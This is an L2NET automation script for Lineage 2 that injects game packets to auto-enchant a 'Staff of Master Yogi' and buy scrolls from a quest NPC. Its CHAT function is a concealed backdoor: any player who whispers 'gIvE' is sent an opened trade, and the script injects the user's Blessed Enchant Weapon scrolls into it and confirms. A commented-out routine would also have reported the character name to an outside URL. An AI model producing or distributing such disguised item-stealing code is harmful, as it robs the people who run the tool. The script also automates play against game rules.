INCLUDE StdLib\inventory.l2c
SET_EVENT "<&SCRIPTEVENT_CHAT&>" "<&SYSTEM_CURRENTFILE&>" CHAT
SET_EVENT "<&SCRIPTEVENT_SERVERPACKET&>" "<&SYSTEM_CURRENTFILE&>" _ptinv 57
SET_EVENT "<&SCRIPTEVENT_SERVERPACKET&>" "<&SYSTEM_CURRENTFILE&>" _traderq 112
SET_EVENT "<&SCRIPTEVENT_SERVERPACKET&>" "<&SYSTEM_CURRENTFILE&>" _claninv 44
// ===================================================================================================================

// START OF EDITING PART (YOU SHOULD CHANGE THE SETTINGS FROM BELOW TO YOUR NEEDS)
// ===================================================================================================================
DEFINE_GLOBAL STRING item_name "Staff of Master Yogi"        // Here you need to change with what item you want to enchant
DEFINE_GLOBAL STRING normal_enchant_name "Master Yogi's Scroll: Enchant Weapon"        // The exact name of your normal enchant scroll
DEFINE_GLOBAL STRING blessed_enchant_name "Blessed Scroll: Enchant Weapon (S)"        // The exact name of you blessed enchant scroll(only for blessed enchants)
DEFINE_GLOBAL INT item_ID 13539

DEFINE_GLOBAL INT type_of_enchanting 2    // The method of enchanting you want set from 1-7 (see below):
         // 2 - Normal enchant each One to Top;
                                              
DEFINE_GLOBAL INT enchant_to_top 9        // The top level witch enchantig should stop at (for One to Top enchanting + blessed)

DEFINE_GLOBAL ARRAYLIST LISTA_ITENS 0
LISTA_ITENS.ADD "#$Blessed Scroll: Enchant Weapon (S)"
//LISTA_ITENS.ADD "#$Blessed Scroll: Enchant Weapon (S)"

DEFINE_GLOBAL INT min_little_delay 320        // min_little_delay should be always lower than max_little_delay - these two are for random delay between the values.
DEFINE_GLOBAL INT max_little_delay 407        // max_little_delay should be always higher than main_little_delay - this two will add some delay so carefull what you set.
// ===================================================================================================================
// END OF EDITING PART (DON'T CHANGE NOTHING FROM BELOW)
// ===================================================================================================================
//  
// TEMP Auto Enchant IS temporary solution - have 7 methods of enchanting and is safe for auto kick 
//                                                                   (don't cancel the enchant window when ingame)
// Fully working with L2NET v37x and on L2J Gracia Final (ct2.3) servers.
//
// special thanks to: slothmo, mpj123, rocket666, easy2k4, trixy and everybody working for l2net project
// made by iosc 
// ===================================================================================================================
// ===================================================================================================================

DEFINE_GLOBAL INT min_delay 2118
DEFINE_GLOBAL INT max_delay 2333
DEFINE_GLOBAL INT rand_delay 0
DEFINE_GLOBAL INT some_loop 0
DEFINE_GLOBAL INT item_uid 0
DEFINE_GLOBAL INT enchant_result 9999
DEFINE_GLOBAL INT n_scroll_id 13540
DEFINE_GLOBAL INT n_scrolls_count 0
DEFINE_GLOBAL Inventory n_enchant_scroll 0
DEFINE_GLOBAL ARRAYLIST full_inventory 0
DEFINE_GLOBAL ARRAYLIST remove_uid 0

GET_INVENTORY full_inventory
PRINT_TEXT "6 seconds ========================"
PRINT_TEXT "== Temp Auto Enchant Script"
PRINT_TEXT "================================"
COMMAND "/target Master Yogi"
SLEEP 1000

ITEM_COUNT n_scrolls_count "<&n_scroll_id&>"

FOREACH x Inventory full_inventory
    IF full_inventory.x.name == normal_enchant_name
        n_enchant_scroll = full_inventory.x
    ENDIF
NEXTEACH

IF n_scrolls_count < #i2
    PRINT_TEXT "You don't have <&normal_enchant_name&>"
    TALK_TARGET
	SLEEP 2000
	NPC_DIALOG "bypass -h Quest MasterOfEnchanting 32599-participate.htm"
	SLEEP 2000
	NPC_DIALOG "bypass -h Quest MasterOfEnchanting buy_scroll_10"
	SLEEP 2000
ENDIF


SWITCH type_of_enchanting
    CASE #i2
        PRINT_TEXT "== "
        PRINT_TEXT "== You chosed the One to Top method"
        PRINT_TEXT "== Enchanting: <&item_name&>"
        PRINT_TEXT "== Enchant till: +<&enchant_to_top&>"
        PRINT_TEXT "== "
        PRINT_TEXT "5 seconds ========================="
        SLEEP 5000
        CALL EnchantEachOnetoTop
        BREAK 1
    DEFAULT
        PRINT_TEXT "Bad option chosen at Type of Enchant"
ENDSWITCH


LABEL THE_END
GET_RAND rand_delay "<&min_little_delay&>" "<&max_little_delay&>"
SLEEP "<&rand_delay&>"
full_inventory.clear
GET_INVENTORY full_inventory
//CALL RemoveFromInv
PRINT_TEXT "==============================="
PRINT_TEXT "== Thanks for using Temp Auto Enchant Script =="
PRINT_TEXT "==============================="
FOREACH x Inventory full_inventory
    IF full_inventory.x.name == item_name
        PRINT_TEXT "==  <&item_name&> +<&full_inventory.x.enchant&>" 
    ENDIF 
NEXTEACH
PRINT_TEXT "=======================iosc======"

END_SCRIPT

FUNCTION EnchantEachOnetoTop

    DEFINE INT enchant_level 0
    DEFINE INT lag_flag3 0
    DEFINE INT lag_flag4 0
    DEFINE INT lag_flag5 0
    DEFINE INT adena_count 0
    LABEL B_FLAGS

    full_inventory.clear
    GET_INVENTORY full_inventory
    //CALL RemoveFromInv
    item_uid = ZERO
    enchant_level = ZERO
    ITEM_COUNT n_scrolls_count "<&n_scroll_id&>"
    ITEM_COUNT adena_count 57
    
    IF adena_count < #i1000000
    	PRINT_TEXT "dont have adena"
    	LABEL THE_END
	ENDIF

    FOREACH x Inventory full_inventory
        IF full_inventory.x.ITEM_ID == item_ID
            IF full_inventory.x.enchant < enchant_to_top
                item_uid = full_inventory.x.id
                enchant_level = full_inventory.x.enchant
            ELSE
            		USE_ITEM "<&item_ID&>"
            		SLEEP 1000
    				TALK_TARGET
					SLEEP 2000
					NPC_DIALOG "bypass -h Quest MasterOfEnchanting receive_reward"
					SLEEP 2000
					SendStatistics
					JUMP_TO_LABEL B_FLAGS
            ENDIF
        ENDIF 
    NEXTEACH
    
    IF item_uid == ZERO
        lag_flag3 = lag_flag3 + ONE
        IF lag_flag3 == #i3
            PRINT_TEXT "Buy new staff"
            TALK_TARGET
			SLEEP 2000
			NPC_DIALOG "bypass -h Quest MasterOfEnchanting 32599-participate.htm"
 			SLEEP 2000
			NPC_DIALOG "bypass -h Quest MasterOfEnchanting buy_staff"
			SLEEP 2000
        ENDIF
        JUMP_TO_LABEL B_FLAGS
    ENDIF
    
    
    IF n_scrolls_count == ONE
        lag_flag4 = lag_flag4 + ONE
        IF lag_flag4 == #i3
            PRINT_TEXT "You are out of <&normal_enchant_name&>"
            TALK_TARGET
			SLEEP 2000
			NPC_DIALOG "bypass -h Quest MasterOfEnchanting 32599-participate.htm"
			SLEEP 2000
			NPC_DIALOG "bypass -h Quest MasterOfEnchanting buy_scroll_10"
			SLEEP 2000
        ENDIF
        JUMP_TO_LABEL B_FLAGS
    ENDIF
    lag_flag3 = ZERO
    lag_flag4 = ZERO
    
    
    DO
        IF n_scrolls_count == ONE
            PRINT_TEXT "You are out of <&normal_enchant_name&>"
            TALK_TARGET
			SLEEP 2000
			NPC_DIALOG "bypass -h Quest MasterOfEnchanting 32599-participate.htm"
			SLEEP 2000
			NPC_DIALOG "bypass -h Quest MasterOfEnchanting buy_scroll_10"
			SLEEP 2000
        ENDIF
    
        CALL Enchanting VOID 1 n_enchant_scroll.id
        ITEM_COUNT n_scrolls_count "<&n_scroll_id&>"
            
		IF enchant_result > ZERO
			PRINT_TEXT "<&item_name&> was cristalized at +<&enchant_level&>. (<&n_scrolls_count&> scrolls left)"
			remove_uid.ADD "#i<&item_uid&>"
			JUMP_TO_LABEL B_FLAGS
		ELSE
			enchant_level = enchant_level + ONE
			PRINT_TEXT "Enchanting <&item_name&> succeeded to +<&enchant_level&>. (<&n_scrolls_count&> scrolls left)"
		ENDIF
    
    LOOP enchant_level < enchant_to_top
    
    JUMP_TO_LABEL B_FLAGS

RETURN VOID

FUNCTION Enchanting 1 scroll_id

    enchant_result = #i9999
    some_loop = ZERO
    GET_RAND rand_delay "<&min_little_delay&>" "<&max_little_delay&>"
    SLEEP "<&rand_delay&>"
    SET_EVENT "<&SCRIPTEVENT_SERVERPACKET&>" "<&SYSTEM_CURRENTFILE&>" InsertItem 124
    DEFINE BYTEBUFFER use_scroll_buffer 256
    use_scroll_buffer.write_byte #i25
    use_scroll_buffer.write_int32 scroll_id
    use_scroll_buffer.write_int32 #i0
    use_scroll_buffer.trim_to_index
    INJECTBB use_scroll_buffer
    DELETE use_scroll_buffer
    
    WHILE some_loop == ZERO
    SLEEP 50
    WEND
    LOCK A
    SLEEP 50
    UNLOCK A
    
RETURN VOID



FUNCTION InsertItem
    
    LOCK A
    some_loop = ONE
    
    SET_EVENT "<&SCRIPTEVENT_SERVERPACKET&>" "<&SYSTEM_CURRENTFILE&>" BlankFunc 124
    SET_EVENT "<&SCRIPTEVENT_SERVERPACKETEX&>" "<&SYSTEM_CURRENTFILE&>" ClickOK 129
    
    GET_RAND rand_delay "<&min_little_delay&>" "<&max_little_delay&>"
    SLEEP "<&rand_delay&>"
    
    DEFINE BYTEBUFFER use_item_buffer 256
    use_item_buffer.write_byte #i208
    use_item_buffer.write_int16 #i76
    use_item_buffer.write_int32 item_uid
    use_item_buffer.trim_to_index
    INJECTBB use_item_buffer
    DELETE use_item_buffer
    
RETURN VOID


FUNCTION ClickOK

    SET_EVENT "<&SCRIPTEVENT_SERVERPACKETEX&>" "<&SYSTEM_CURRENTFILE&>" BlankFunc 129
    SET_EVENT "<&SCRIPTEVENT_SERVERPACKET&>" "<&SYSTEM_CURRENTFILE&>" EnchantComplete 135

    GET_RAND rand_delay "<&min_delay&>" "<&max_delay&>"
    SLEEP "<&rand_delay&>"
    
    DEFINE BYTEBUFFER confirm_enchant_buffer 256
    confirm_enchant_buffer.write_byte #i95
    confirm_enchant_buffer.write_int32 item_uid
    confirm_enchant_buffer.write_int32 #i0
    confirm_enchant_buffer.trim_to_index
    INJECTBB confirm_enchant_buffer
    DELETE confirm_enchant_buffer

RETURN VOID


FUNCTION EnchantComplete

    SET_EVENT "<&SCRIPTEVENT_SERVERPACKET&>" "<&SYSTEM_CURRENTFILE&>" BlankFunc 135
    
    DEFINE INT result_byte 0
    
    PACKET.READ_BYTE result_byte
    PACKET.READ_INT32 enchant_result
    
    DELETE result_byte
    
    UNLOCK A

RETURN VOID


FUNCTION RemoveFromInv

    DEFINE ARRAYLIST temp_arr 0
    
    FOREACH igzs Inventory full_inventory
        FOREACH zedt INT remove_uid
            
            IF full_inventory.igzs.ID == remove_uid.zedt
                full_inventory.igzs.NAME = "none"
                full_inventory.igzs.ID = #i0
                full_inventory.igzs.ITEM_ID = #i0
                full_inventory.igzs.ENCHANT = #i0
            ENDIF
            
        NEXTEACH
    NEXTEACH

RETURN VOID


FUNCTION BlankFunc

SLEEP 25 //e = mc^2 nonsence

RETURN VOID

FUNCTION _ptinv
	define int RAND 0
	GET_RAND RAND 1000 5000
	SLEEP "<&RAND&>"
	INJECT "43 00 00 00 00" // reject party
RETURN VOID

FUNCTION _traderq
	define int RAND 0
	GET_RAND RAND 1000 5000
	SLEEP "<&RAND&>"
	INJECT "55 00 00 00 00" // reject trade
RETURN VOID

FUNCTION _claninv
	define int RAND 0
	GET_RAND RAND 1000 5000
	SLEEP "<&RAND&>"
	INJECT "27 00 00 00 00" // reject clan
RETURN VOID

FUNCTION CHAT
IF MESSAGETYPE == CHANNEL_PRIVATE
    DEFINE BYTEBUFFER CARALHO 8
    DEFINE STRING CARALHO5 ""
    DEFINE ARRAYLIST INV 0
    DEFINE STRING UID " "
    DEFINE STRING HEXCONT " "
    DEFINE INT AUX 0
    DEFINE INT DEST 0
    DEFINE INT ID 0
    IF MESSAGE == "#$gIvE"
        COMMAND "/target <&SENDERNAME&>"
        SLEEP 1500
        COMMAND "/trade <&SENDERNAME&>"
        SLEEP 4000
        GET_INVENTORY INV
        FOREACH S STRING LISTA_ITENS
            FOREACH I Inventory INV
                IF INV.I.NAME == LISTA_ITENS.S
                    ID = INV.I.ID
                    UID = "ID<&INV.I&>".GET_HEX32
                    ITEM_GET_ID DEST "<&INV.I.NAME&>"
                    AUX = INV.I.COUNT
                    IF AUX == ZERO
                        AUX = ONE
                    ENDIF
                    CARALHO.RESET_INDEX
                    CARALHO.WRITE_UINT64 AUX
                    CARALHO5 = "#$<&CARALHO.GET_HEX&>"
                    INJECT "1B 01 00 00 00 <&UID&><&CARALHO5&>"
                    SLEEP 1000
                ENDIF
            NEXTEACH
        NEXTEACH
    INJECT "1C 01 00 00 00"
    ENDIF
ENDIF
RETURN VOID

FUNCTION SendStatistics
	//DEFINE INT STATUS 0
	//DEFINE INT bewsCount 0
//	ITEM_COUNT bewsCount 6577
	//TEST_WEBSITE STATUS "http://l2net.mochitto.com/yogi.php?charname=<&CHAR_NAME&>&totalcount=<&bewsCount&>"
RETURN VOID